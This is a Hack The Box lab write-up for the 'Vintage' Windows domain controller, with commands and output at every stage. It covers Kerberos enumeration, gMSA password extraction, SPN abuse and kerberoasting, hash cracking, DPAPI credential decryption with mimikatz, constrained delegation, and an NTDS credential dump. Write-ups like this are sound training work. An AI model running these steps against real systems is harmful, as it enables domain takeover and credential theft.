HTB - Vintage

Enumeration

As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49670/tcp open  unknown
49681/tcp open  unknown
49689/tcp open  unknown
49708/tcp open  unknown

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV 10.129.124.148 -oN Nmap/script-scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Active Directory LDAP (Domain: vintage.htb)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Active Directory LDAP (Domain: vintage.htb)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Summary

* Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985
* Services: DNS - KERBEROS - RPC - LDAP - LDAPS - SMB - winRM
* Important notes: Domain: vintage.htb

hosts file

Update the hosts file to avoid encountering any issues when authenticating to the domain

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $sudo sh -c "echo  '10.129.124.148 dc01 vintage.htb dc01.vintage.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $tail -n1 /etc/hosts
10.129.124.148 dc01 vintage.htb dc01.vintage.htb

DNS Enumeration

Zone transfer failed

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip vintange.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $dig axfr @$ip dc01.vintange.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.129.124.148 dc01.vintange.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

RPC & SMB Enumeration

Every time I connect to rpc With invalid credentials, it gives me Access_denied But this weird error message is unique this time:

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip
Cannot connect to server.  Error was NT_STATUS_NOT_SUPPORTED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $rpcclient -U "%" $ip -c enumdomusers
Cannot connect to server.  Error was NT_STATUS_NOT_SUPPORTED

The same thing with SMB using netexec

Kerberos & LDAP Enumeration

NT_STATUS_NOT_SUPPORTED flag means NTLM authentication is disabled, so I have to use kerberos authentication instead.

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k  --admin-count

LDAP        dc01   389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb Administrator
LDAP        dc01            389    dc01.vintage.htb Administrators
LDAP        dc01            389    dc01.vintage.htb Print Operators
LDAP        dc01            389    dc01.vintage.htb Backup Operators
LDAP        dc01            389    dc01.vintage.htb Replicator
LDAP        dc01            389    dc01.vintage.htb L.Bianchi_adm

I will note L.Bianchi_adm The user is a high-value target in my notes, then continue enumerating.

Getting all users in the domain and their description field

Checking for PKI, LDAP signing and Machine Account Qouta

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u P.Rosa -p Rosaisbest123 -d vintage.htb -k -M adcs -M ldap-checker -M maq

LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
ADCS        dc01            389    dc01.vintage.htb [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

LDAP-CHE... dc01            389    dc01.vintage.htb [-] [Errno -2] Name or service not known
LDAP-CHE... dc01            389    dc01.vintage.htb LDAP Signing NOT Enforced!

MAQ         dc01            389    dc01.vintage.htb [*] Getting the MachineAccountQuota
MAQ         dc01            389    dc01.vintage.htb MachineAccountQuota: 0

Password Reuse failed

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u users.list -p Rosaisbest123 -d vintage.htb -k --continue-on-success
LDAP        dc01            389    dc01.vintage.htb [*]  x64 (name:dc01.vintage.htb) (domain:vintage.htb) (signing:True) (SMBv1:False)
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\L.Bianchi_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\C.Neri_adm:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_ark:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_ldap:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\svc_sql:Rosaisbest123 KDC_ERR_CLIENT_REVOKED
LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\P.Rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\C.Neri:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\G.Viola:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\L.Bianchi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\R.Verdi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED
LDAP        dc01            389    dc01.vintage.htb [-] vintage.htb\M.Rossi:Rosaisbest123 KDC_ERR_PREAUTH_FAILED

Foothold

With a domain user credential, I can use bloodhound.py and dump ldap data for further enumeration, then ingesting the zip file into bloodhoud CE

`FS01` is a member of PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB

Attack Explain (Pre-Windows 2000 computers | The Hacker Recipes) Reference: TrustedSec | Diving into Pre-Created Computer Accounts

From the post, computer assigned with pre-windows 2000 attribute has the password of its lowercase name

Confirming it with netexec

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap 10.129.232.23 -u 'fs01$' -p fs01 -k

LDAP   10.129.232.23   389    dc01.vintage.htb [+] vintage.htb\fs01$:fs01

With fs01$ computer account, I can extract GMSA secret hash due to ReadGMSAPassword privilege

First, get a Kerberos ticket for fs01$ and then provide it to KRB5CCNAME variable to extract the GMSA secrets with bloodyAD

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit 'fs01$'
Password for fs01$@VINTAGE.HTB: fs01

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: fs01$@VINTAGE.HTB

Valid starting       Expires              Service principal
12/01/2024 09:23:42  12/01/2024 19:23:42  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 12/02/2024 09:23:40

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k get object 'GMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7axxxxxxxxxxxxxxx
msDS-ManagedPassword.B64ENCODED: c6qwf6x+EXiEYKGhCu/wTBcnxxxxxxxxxxxxxxxxxxxxxxCaIhn2MobwBxF4Q6fd3W5P13wvh2Jf/Wp2WHsjIEjkbF0duDHoCBAK31Q+BoQg0eUHbsRcksNrkLcPtkZ5eUhK+TzgpXeFKt0VCOWFkAOStKE1H5PDfUGoC2xuP+Tceg7iV0IcMBaR8Db3UgqaqP2LLRiimuL6ZO4xl6sSRKrdRQEQOR7L9fFw9JW7myCsbj2TPxFc5WaMQtWi456OvwBQn4jhdty5tSjv2uMlcq+sQMz60voxH6sClACPGKJMCr2FNVJP6dd1GTdvh6n5Dbh/yhHCAF8UzYeGXv2Nx3Dw==

Get a Kerberos ticket for GMSA01$ the account.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $impacket-getTGT vintage.htb/'gmsa01$'@dc01 -hashes :54311f0ed05b807a7aaf5943b595f224

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in gmsa01$@dc01.ccache

GMSA01$ can add itself or any user to Service Managers group, so I will add P.Rosa to that group because I have his password and it's easy to move when you have a password :))

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa

[+] P.Rosa added to CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB

Membership in service managers Group grants me the ability to change the password of three service users or assign a fake SPN to them

Trying to perform targetkerberos against svc_sql account and enable it because I can't request Service Ticket (ST) for disabled accounts

Using PowerView.py I can enable the account, then assign a SPN for it

(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set serviceprincipalname='service/dc01.vintage.htb'

[2024-12-01 10:13:49] [Set-DomainObject] Success! modified attribute serviceprincipalname for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb

(LDAP)-[dc01.vintage.htb]-[VINTAGE\P.Rosa]
PV > Set-DomainObject -Identity svc_sql -Set userAccountControl=512             

[2024-12-01 10:18:27] [Set-DomainObject] Success! modified attribute useraccountcontrol for CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb

Perform a kerberoasting attack

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc ldap dc01 -u p.rosa -p Rosaisbest123 -k --kerberoasting kerberos.hash

LDAP        dc01            389    dc01.vintage.htb [+] vintage.htb\p.rosa:Rosaisbest123 
LDAP        dc01            389    dc01.vintage.htb Bypassing disabled account krbtgt 
LDAP        dc01            389    dc01.vintage.htb [*] Total of records returned 1
LDAP        dc01            389    dc01.vintage.htb sAMAccountName: svc_sql memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb pwdLastSet: 2024-12-01 10:12:04.583550 lastLogon:<never>
LDAP        dc01            389    dc01.vintage.htb $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$blob...

Crack the hash

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt

$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb/svc_sql*$5c8b7f808a8cf1a4eb8cdc495b8f71b9$13310d68a29e5f44f74d55c066d19a6d3f187906b54c866fd860784de403813e9a8772ec270e8734b4d89d04dc51a4e569c92beac67729b043471fe387c8659a945e9893e3ebafe0b97e6e8ee912354186321c1029a5b9aca893aa5a6e2197493250e38b1ef7a0cc554b70dc16da09d29207172e7ef3715a41c5f36ce3d5bc6801a5ff7a382c0217e43c2f8daaf84e742e17a..snip..5:Zerxxxxxxx

Session..........: hashcat
Status...........: Cracked

Spraying the password reveals that C.Neri has the same one

Since C.Neri is in Remote Management UsersI will access the machine with evil-winrm but first get kerberos ticket for him.

To perform kerberos authentication from Linux, you must configure /etc/krb5.conf first

[libdefaults]
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
        default_domain = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $kinit C.Neri
Password for C.Neri@VINTAGE.HTB: 

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: C.Neri@VINTAGE.HTB

Valid starting       Expires              Service principal
12/01/2024 10:27:07  12/01/2024 20:27:07  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 12/02/2024 10:27:02

Access the machine via winRM using Kerberos authentication

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $KRB5CCNAME=/tmp/krb5cc_1000 evil-winrm -i dc01 -r vintage.htb

*Evil-WinRM* PS C:\Users\C.Neri\Desktop> type user.txt
35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx

User Flag: 35cb0ccde18da32e0366xxxxxxxxxxxxxxxxx

Lateral Movement

Inside C.Neri folder, there are DPAPI-encrypted credentials

DPAPI stands for Data Protected API which is Microsoft encryption mechanism. It can be decrypted by the user's password who encrypt it and his masterkey

Normal Location of DPAPI:
- %USERPROFILE%\AppData\Roaming\Microsoft\Credentials
- %USERPROFILE%\AppData\LOCAL\Microsoft\Credentials
The master key Location:
- %USERPROFILE%\AppData\Roaming\Microsoft\Protect\SID\

JokerShell C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> ls -Force

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          6/7/2024   5:08 PM            430 C4BB96844A5C9DD45D5B6A9859252BA6

We can either encode this encrypted credential by base64 encoding, then transfer to our windows VM along with the master keys to decrypt it locally.

After doing so, we can use mimikatz.exe with dpapi::masterkey first to get the master key, then with dpapi::cred to extract the credential with the obtained master key.

dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected

dpapi::masterkey /in:C:\Users\Dark_Man\Downloads\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b /sid:S-1-5-21-4024337825-2033394866-2055507597-1115 /password:Zerxxxxxxx /protected

[masterkey] with password: Zerxxxxxxx (protected user)
  key : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
  sha1: 637b40612daf4b1bd99785833479898aeb6d9739

dpapi::cred /in:C:\Users\Dark_Man\Downloads\C4BB96844A5C9DD45D5B6A9859252BA6 /masterkey:55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f

Decrypting Credential:
 * masterkey     : 55d51b40d9aa74e8cdc44a6d24a25xxxxxxxxxxxxxxxxxxxxxxxxxx048b60a652b5330ff2635a511210209b28f81c3efe16b5aee3d84b5a1be3477a62e25989f
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000da - 218
  credUnk0       : 00000000 - 0

  Type           : 00000001 - 1 - generic
  Flags          : 00000000 - 0
  LastWritten    : 6/7/2024 3:08:23 PM
  unkFlagsOrSize : 00000030 - 48
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : LegacyGeneric:target=admin_acc
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : vintage\c.neri_adm
  CredentialBlob : Uncr4ckxxxxxxxxxxxd0312
  Attributes     : 0

Privilege Escalation

Attack Explain:
1. With GenericWrite on DELEGATEDADMINS, I can add any user to this group
2. With DELEGATEDADMINS privileges, I can perform Constrained Delegation and request a ticket for CIFS
3. With this ticket, I can dump NTDS.DIT database with secretdump.py

This is a script running on the box resetting any change made by players, So I will put the steps we did before here to make things fast.

Adding P.Rosa to SERVICEMANAGERS groups (Previous Step)

KRB5CCNAME=`pwd`/'gmsa01$@dc01.ccache' bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" P.Rosa

Set SPN to svc_sql With proper syntax Service/FQDN and enable the account if it's disabled again

Set-DomainObject -Identity svc_sql -Set userAccountControl=512 
Set-DomainObject -Identity svc_sql -Set serviceprincipalname='MSSQLSvc/dc01.vintage.htb'
OR
KRB5CCNAME=`pwd`/p.rosa.ccache bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip dc01 -k set object 'SVC_SQL' servicePrincipalName -v 'MSSQLSvc/dc01.vintage.htb'

Abuse GenericWriteprivileges

KRB5CCNAME=`pwd`/c.neri_adm.ccache bloodyAD -k --host dc01.vintage.htb --dc-ip dc01 -d 'VINTAGE.HTB' add groupMember 'DELEGATEDADMINS' 'svc_sql'

Perform Constrained Delegation attack

getST.py -spn 'cifs/dc01.vintage.htb' -impersonate 'dc01$' 'vintage.htb/svc_sql':'Zerxxxxxxx' -k

Export the ticket to KRB5CCNAME and dump ntds using netexec

Note: I will use L.BIANCHI_ADM DA user instead of normal Administrator user.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -d vintage.htb -k --use-kcache --ntds --user L.BIANCHI_ADM                                          
SMB      dc01    445    dc01     [+] vintage.htb\dc01$ from ccache
SMB      dc01    445    dc01             L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:8e83e02f54e85de52xxxxxxxxxxxx4:::

impacket-getTGT vintage.htb/l.bianchi_adm@dc01 -hashes :8e83e02f54e85dexxxxxxxxxxxxx

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $nxc smb dc01 -k --use-kcache -d vintage.htb

SMB   dc01    445    dc01     [+] vintage.htb\l.bianchi_adm from ccache (Pwn3d!)

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Vintage]
└──╼ $evil-winrm -i dc01 -r vintage.htb

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a35039cb0106fdd70bcxxxxxxxxxxxxxx

Root Flag: a35039cb0106fdd70bcxxxxxxxxxxxxxx

PreviousHTB -Acute NextHTB - Certificate

Last updated 8 months ago